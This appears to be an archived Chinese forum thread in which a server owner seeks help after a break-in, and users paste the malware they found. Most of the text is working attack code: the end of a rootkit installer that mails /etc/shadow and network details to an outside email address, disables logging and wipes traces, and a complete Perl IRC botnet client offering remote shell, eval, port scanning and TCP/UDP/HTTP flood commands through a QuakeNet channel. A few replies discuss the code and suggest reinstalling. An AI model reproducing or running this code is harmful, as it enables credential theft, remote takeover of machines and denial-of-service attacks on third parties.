echo \"${DCYN}[${WHI}sh${DCYN}]# Arch : ${WHI}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk \' {print $3}\'` \'${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]# Alternative IP :${WHI} \"`hostname -i`\" -+-Might be [\"`/sbin/ifconfig | grep \\eth | wc -l`\" ] active adapters.${RES}\"

if [ -f /etc/redhat-release ]; then
echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/redhat-release`${RES}\"
elif [ -f /etc/slackware-version ]; then
echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/slackware-version`${RES}\"
elif [ -f /etc/debian_version ]; then
echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/debian_version`${RES}\"
elif [ -f /etc/SuSE-release ]; then
echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/SuSE-release`${RES}\"
elif [ -f /etc/issue ]; then
echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/issue`${RES}\"
else echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} unknown${RES}\"
fi

rm -rf /tmp/info_tmp
cat /etc/shadow >> /tmp/.cln
/sbin/ifconfig >> /tmp/.cln
cat /etc/issue >> /tmp/.cln
#cat /tmp/.cln | mail $md5sum -s \"$1:$2:`hostname -f`:$MYIPADDR\"
cat /tmp/.cln | mail -s \"rk\" geox_go@yahoo.com
cat /lib/libsh.so/shdcf >> /tmp/.mf
cat /tmp/.mf | mail -s \"rk por\" geox_go@yahoo.com
cat /tmp/.mf | mail -s \"rk por\" geox_go@yahoo.com
cat /tmp/.cln | mail -s \"rk\" geox_go@yahoo.com

rm -rf /tmp/.cln
rm -rf /tmp/.mf

endtime=`date +%S`
total=`expr $endtime - $startime`

echo \"\"
echo \"${WHI}--------------------------------------------------------------------${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]# ipchains ... ? ${RES}\"

if [ -f /sbin/ipchains ]; then
echo \"${WHI}`/sbin/ipchains -L input | head -5`${RES}\"
else
echo \"\"
echo \"${DCYN}[${WHI}sh${DCYN}]# lucky for u no ipchains found${RES}\"
fi

echo \"${WHI}--------------------------------------------------------------------${RES}\"

echo \"${DCYN}[${WHI}sh${DCYN}]# iptables ...?${RES}\"

if [ -f /sbin/iptables ]; then
echo \"${WHI}`/sbin/iptables -L input | head -5`${RES}\"
else
echo \"\"
echo \"${DCYN}[${WHI}sh${DCYN}]# lucky for u no iptables found${RES}\"
fi
echo \"${WHI}--------------------------------------------------------------------${RES}\"

echo \"${DCYN}[${WHI}sh${DCYN}]# Just ignore all errors if any ! \"
echo \"${DCYN}[${WHI}sh${DCYN}]# ============================== ${RED}Backdooring completed in :$total seconds ${RES}\"

if [ -f /usr/sbin/syslogd ]; then
/usr/sbin/syslogd -m 0
else
/sbin/syslogd -m 0
fi

if [ -f /usr/sbin/inetd ]; then
killall -HUP inetd >/dev/null 2>&1
elif [ -f /usr/sbin/xinetd ]; then
killall -HUP xinetd
fi
rm -rf .sshd
cd $BASEDIR
rm -rf ../shv5*
#sendmail root -p geox_go@yahoo.com

rm -rf bin* conf* lib* utilz* rk.jpg setup
# EOF

hello2crawler 发表于 2010-4-5 12:09

本帖最后由 hello2crawler 于 2010-4-5 00:45 编辑

.sshd是个perl脚本...貌似就是公布肉鸡地址的?
而且看起来这个不像是通知入侵者的... 加上他还打错字改root密码= = 应该不是什么牛逼人士了.

#!/usr/bin/perl
####################################################
# Hawker Hunter v2.0 (ARZ Co. Ltd.) Legacy 2009(c) #
####################################################

#############CONF###################################
my $hidden = \'/usr/sbin/apache/log\';
my $linas_max=\'4\';
my $sleep=\'5\';
my @admins=(\"Geox\");
my @hostauth=(\"geox.users.quakenet.org\");
my @channels=(\"#sniffer\");
my $nick=\'Sonia\';
my $ircname =\'furt\';
my $realname = \'pe fatza\';
my $server=\'multiplay.uk.quakenet.org\';
my $port=\'6667\';
####################################################
###########theRe we Go##############################
$SIG{\'INT\'} = \'IGNORE\';
$SIG{\'HUP\'} = \'IGNORE\';
$SIG{\'TERM\'} = \'IGNORE\';
$SIG{\'CHLD\'} = \'IGNORE\';
$SIG{\'PS\'} = \'IGNORE\';
use IO::Socket;
use Socket;
use IO::Select;
chdir(\"/\");
$0=\"$hidden\".\"\\0\"x16;;
my $pid=fork;
exit if $pid;
die \"fork problem: $!\" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == \'1\') {
my $socket = $_;
print $socket \"$_\\n\";
} else {
   print $IRC_cur_socket \"$_\\n\";
}
}

sub conectar {
my $meunick = $_;
my $server_con = $_;
my $port_con = $_;

my $IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$server_con\", PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);

$irc_servers{$IRC_cur_socket}{\'host\'} = \"$server_con\";
$irc_servers{$IRC_cur_socket}{\'port\'} = \"$port_con\";
$irc_servers{$IRC_cur_socket}{\'nick\'} = $meunick;
$irc_servers{$IRC_cur_socket}{\'meuip\'} = $IRC_socket->sockhost;
nick(\"$meunick\");
sendraw(\"USER $ircname \".$IRC_socket->sockhost.\" $server_con :$realname\");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar(\"$nick\", \"$server\", \"$port\"); }
delete($irc_servers{\'\'}) if (defined($irc_servers{\'\'}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{\'nick\'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
   $sel_cliente->remove($fh);
   $fh->close;
   delete($irc_servers{$fh});
}
@lines = split (/\\n/, $msg);

for(my $c=0; $c<= $#lines; $c++) {
   $line = $lines[$c];
   $line=$line_temp.$line if ($line_temp);
   $line_temp=\'\';
   $line =~ s/\\r$//;
   unless ($c == $#lines) {
      parse(\"$line\");
   } else {
      if ($#lines == 0) {
         parse(\"$line\");
      } elsif ($lines[$c] =~ /\\r$/) {
            parse(\"$line\");
      } elsif ($line =~ /^(\\S+) NOTICE AUTH :\\*\\*\\*/) {
            parse(\"$line\");
      } else {
            $line_temp = $line;
      }
   }
   }
}
}

sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \\:(.*)/) {
sendraw(\"PONG :$1\");
} elsif ($servarg =~ /^\\:(.+?)\\!(.+?)\\@(.+?) PRIVMSG (.+?) \\:(.+)/) {
   my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
   if ($args =~ /^\\001VERSION\\001$/) {
      notice(\"$pn\", \"\\001VERSION mIRC v6.16 Khaled Mardam-Bey\\001\");
   }
   if (grep {$_ =~ /^\\Q$hostmask\\E$/i } @hostauth) {
   if (grep {$_ =~ /^\\Q$pn\\E$/i } @admins) {
      if ($onde eq \"$meunick\"){
      shell(\"$pn\", \"$args\");
      }
      if ($args =~ /^(\\Q$meunick\\E|\\!zax)\\s+(.*)/ ) {
         my $natrix = $1;
         my $arg = $2;
         if ($arg =~ /^\\!(.*)/) {
         ircase(\"$pn\",\"$onde\",\"$1\") unless ($natrix eq \"!bot\" and $arg =~ /^\\!nick/);
         } elsif ($arg =~ /^\\@(.*)/) {
            $ondep = $onde;
            $ondep = $pn if $onde eq $meunick;
            bfunc(\"$ondep\",\"$1\");
         } else {
            shell(\"$onde\", \"$arg\");
         }
      }
   }
}
} elsif ($servarg =~ /^\\:(.+?)\\!(.+?)\\@(.+?)\\s+NICK\\s+\\:(\\S+)/i) {
   if (lc($1) eq lc($meunick)) {
      $meunick=$4;
      $irc_servers{$IRC_cur_socket}{\'nick\'} = $meunick;
   }
} elsif ($servarg =~ m/^\\:(.+?)\\s+433/i) {
   nick(\"$meunick-\".int rand(999999));
} elsif ($servarg =~ m/^\\:(.+?)\\s+001\\s+(\\S+)\\s/i) {
   $meunick = $2;
   $irc_servers{$IRC_cur_socket}{\'nick\'} = $meunick;
   $irc_servers{$IRC_cur_socket}{\'nome\'} = \"$1\";
   foreach my $channel (@channels) {
      sendraw(\"JOIN $channel hawker\");
   }
}
}

sub bfunc {
my $printl = $_;
my $funcarg = $_;
if (my $pid = fork) {
waitpid($pid, 0);
} else {
   if (fork) {
      exit;
   } else {
      if ($funcarg =~ /^portscan (.*)/) {
         my $hostip=\"$1\";
         my @ports=(\"21\",\"22\",\"23\",\"25\",\"80\",\"113\",\"135\",\"443\",\"445\",\"5900\",\"5901\",\"6660\",\"6661\",\"6662\",\"6663\",\"6665\",\"6666\",\"6667\",\"6668\",\"6669\",\"7000\",\"8080\",\"1080\");
         my (@aberta, %port_banner);
      sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR] 3Scanning4 \".$1.\" for open ports.\");
         foreach my $port (@ports){
            my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $port, Proto => \'tcp\', Timeout => 4);
            if ($scansock) {
               push (@aberta, $port);
               $scansock->close;
            }
         }

         if (@aberta) {
            sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR] 3Open port(s)4: @aberta\");
         } else {
            sendraw($IRC_cur_socket,\"PRIVMSG $printl :[2hawkeR hunteR]3 No open ports found4!\");
         }
      }
      if ($funcarg =~ /^tcpflood\\s+(.*)\\s+(\\d+)\\s+(\\d+)/) {
sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 TCP Attacking4 \".$1.\":\".$2.\" 3for4 \".$3.\" 3seconds.\");
      my $itime = time;
      my ($cur_time);
         $cur_time = time - $itime;
      while ($3>$cur_time){
         $cur_time = time - $itime;
      &tcpflooder(\"$1\",\"$2\",\"$3\");
         }
      sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 TCP Attack done 4\".$1.\":\".$2.\".\");
      }

      if ($funcarg =~ /^httpflood\\s+(.*)\\s+(\\d+)/) {
      sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 HTTP Attacking4 \".$1.\" 3for4 \".$2.\" 3seconds.\");
      my $itime = time;
      my ($cur_time);
         $cur_time = time - $itime;
      while ($2>$cur_time){
         $cur_time = time - $itime;
      my $socket = IO::Socket::INET->new(proto=>\'tcp\', PeerAddr=>$1, PeerPort=>80);
         print $socket \"GET / HTTP/1.1\\r\\nAccept: */*\\r\\nHost: \".$1.\"\\r\\nConnection: Keep-Alive\\r\\n\\r\\n\";
      close($socket);
         }
      sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3HTTP Attacking done \".$1.\".\");
      }
##########UDP-1#############################################
      if ($funcarg =~ /^udp\\s+(.*)\\s+(\\d+)\\s+(\\d+)/) {
         sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 UDP Attacking4 \".$1.\" 3with4 \".$2.\" 3KB(s) for4 \".$3.\" 3seconds.\");
         my ($dtime, %pacotes) = udpflooder(\"$1\", \"$2\", \"$3\");
         $dtime = 1 if $dtime == 0;
         my %bytes;
         $bytes{igmp} = $2 * $pacotes{igmp};
         $bytes{icmp} = $2 * $pacotes{icmp};
         $bytes{o} = $2 * $pacotes{o};
         $bytes{udp} = $2 * $pacotes{udp};
         $bytes{tcp} = $2 * $pacotes{tcp};
         sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 UDP Sent4 \".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024).\" 3Kb in4 \".$dtime.\" 3seconds to \".$1.\".\");
      }
##########UDP-2#############################################
      if ($funcarg =~ /^udp2\\s+(.*)\\s+(\\d+)\\s+(\\d+)\\s+(\\d+)/) {
         sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 UDP2 Attacking4 \".$1.\":\".$4.\" 3with4 \".$2.\" 3KB(s) for4 \".$3.\" 3seconds.\");
         my ($dtime, %pacotes) = udpflooder2(\"$1\", \"$2\", \"$3\",\"$4\");
         $dtime = 1 if $dtime == 0;
         my %bytes;
         $bytes{igmp} = $2 * $pacotes{igmp};
         $bytes{icmp} = $2 * $pacotes{icmp};
         $bytes{o} = $2 * $pacotes{o};
         $bytes{udp} = $2 * $pacotes{udp};
         $bytes{tcp} = $2 * $pacotes{tcp};
         sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 UDP Sent4 \".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024).\" 3Kb in4 \".$dtime.\" 3seconds to \".$1.\".\");
      }
############################################################
      exit;
   }
}
}

sub ircase {
my ($kem, $printl, $case) = @_;

if ($case =~ /^join (.*)/) {
j(\"$1\");
}
if ($case =~ /^part (.*)/) {
   p(\"$1\");
}
if ($case =~ /^rejoin\\s+(.*)/) {
   my $chan = $1;
   if ($chan =~ /^(\\d+) (.*)/) {
   for (my $ca = 1; $ca <= $1; $ca++ ) {
      p(\"$2\");
      j(\"$2\");
   }
   } else {
      p(\"$chan\");
      j(\"$chan\");
   }
}
if ($case =~ /^op/) {
   op(\"$printl\", \"$kem\") if $case eq \"op\";
   my $oarg = substr($case, 3);
   op(\"$1\", \"$2\") if ($oarg =~ /(\\S+)\\s+(\\S+)/);
}
if ($case =~ /^deop/) {
   deop(\"$printl\", \"$kem\") if $case eq \"deop\";
   my $oarg = substr($case, 5);
   deop(\"$1\", \"$2\") if ($oarg =~ /(\\S+)\\s+(\\S+)/);
}
if ($case =~ /^msg\\s+(\\S+) (.*)/) {
   msg(\"$1\", \"$2\");
}
if ($case =~ /^flood\\s+(\\d+)\\s+(\\S+) (.*)/) {
   for (my $cf = 1; $cf <= $1; $cf++) {
   msg(\"$2\", \"$3\");
   }
}
if ($case =~ /^ctcp\\s+(\\S+) (.*)/) {
   ctcp(\"$1\", \"$2\");
}
if ($case =~ /^ctcpflood\\s+(\\d+)\\s+(\\S+) (.*)/) {
   for (my $cf = 1; $cf <= $1; $cf++) {
   ctcp(\"$2\", \"$3\");
   }
}
if ($case =~ /^nick (.*)/) {
   nick(\"$1\");
}
if ($case =~ /^connect\\s+(\\S+)\\s+(\\S+)/) {
   conectar(\"$2\", \"$1\", 6667);
}
if ($case =~ /^raw (.*)/) {
   sendraw(\"$1\");
}
if ($case =~ /^eval (.*)/) {
eval \"$1\";
}
}

sub shell {
my $printl=$_;
my $comando=$_;
if ($comando =~ /cd (.*)/) {
chdir(\"$1\") || msg(\"$printl\", \"No such file or directory\");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
   if (fork) {
      exit;
   } else {
      my @resp=`$comando 2>&1 3>&1`;
      my $c=0;
      foreach my $linha (@resp) {
         $c++;
         chop $linha;
         sendraw($IRC_cur_socket, \"PRIVMSG $printl :$linha\");
         if ($c == \"$linas_max\") {
            $c=0;
            sleep $sleep;
         }
      }
      exit;
   }
}
}

sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_);
$pa=sockaddr_in($_,$ia);
$ftime=$_;
$proto=getprotobyname(\'tcp\');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t=\"SOCK$l\";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t=\"SOCK$l\";
shutdown($t,2);
$l++;
}
}

sub udpflooder {
my $iaddr = inet_aton($_);
my $msg = \'A\' x $_;
my $ftime = $_;
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1; $port <= 65000; $port++) {
   $cur_time = time - $itime;
   last if $cur_time >= $ftime;
   send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
   send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
   send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
   send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;

   for (my $pc = 3; $pc <= 255;$pc++) {
      next if $pc == 6;
      $cur_time = time - $itime;
      last if $cur_time >= $ftime;
      socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
      send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
   }
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}

sub udpflooder2 {
my $iaddr = inet_aton($_);
my $msg = \'A\' x $_;
my $ftime = $_;
my $cp = 0;
my $udpport = $_;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
   $cur_time = time - $itime;
   last if $cur_time >= $ftime;
   send(SOCK1, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{igmp}++;
   send(SOCK2, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{udp}++;
   send(SOCK3, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{icmp}++;
   send(SOCK4, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{tcp}++;

   for (my $pc = 3; $pc <= 255;$pc++) {
      next if $pc == 6;
      $cur_time = time - $itime;
      last if $cur_time >= $ftime;
      socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
      send(SOCK5, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{o}++;
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw(\"PRIVMSG $_ :\\001$_\\001\");
}
sub msg {
return unless $#_ == 1;
sendraw(\"PRIVMSG $_ :$_\");
}
sub notice {
return unless $#_ == 1;
sendraw(\"NOTICE $_ :$_\");
}
sub op {
return unless $#_ == 1;
sendraw(\"MODE $_ +o $_\");
}
sub deop {
return unless $#_ == 1;
sendraw(\"MODE $_ -o $_\");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw(\"JOIN $_\");
}
sub p { part(@_); }
sub part {
sendraw(\"PART $_\");
}
sub nick {
return unless $#_ == 0;
sendraw(\"NICK $_\");
}
sub quit {
sendraw(\"QUIT :$_\");
}

oncename 发表于 2010-4-5 13:00

楼主你vps没有控制面板吗？
简单的方法重装系统改SSH端口吧...
vine 发表于 2010-4-5 11:51 http://bbs.saraba1st.com/2b/images/common/back.gif
就这个方法最简单有效。

hello2crawler 发表于 2010-4-5 13:27

就这个方法最简单有效。
oncename 发表于 2010-4-5 00:00 http://bbs.saraba1st.com/2b/images/common/back.gif

随便拿个端口扫描器就能扫出来拉

页: [1]

Stage1st's Archiver

求助，服务器被黑了……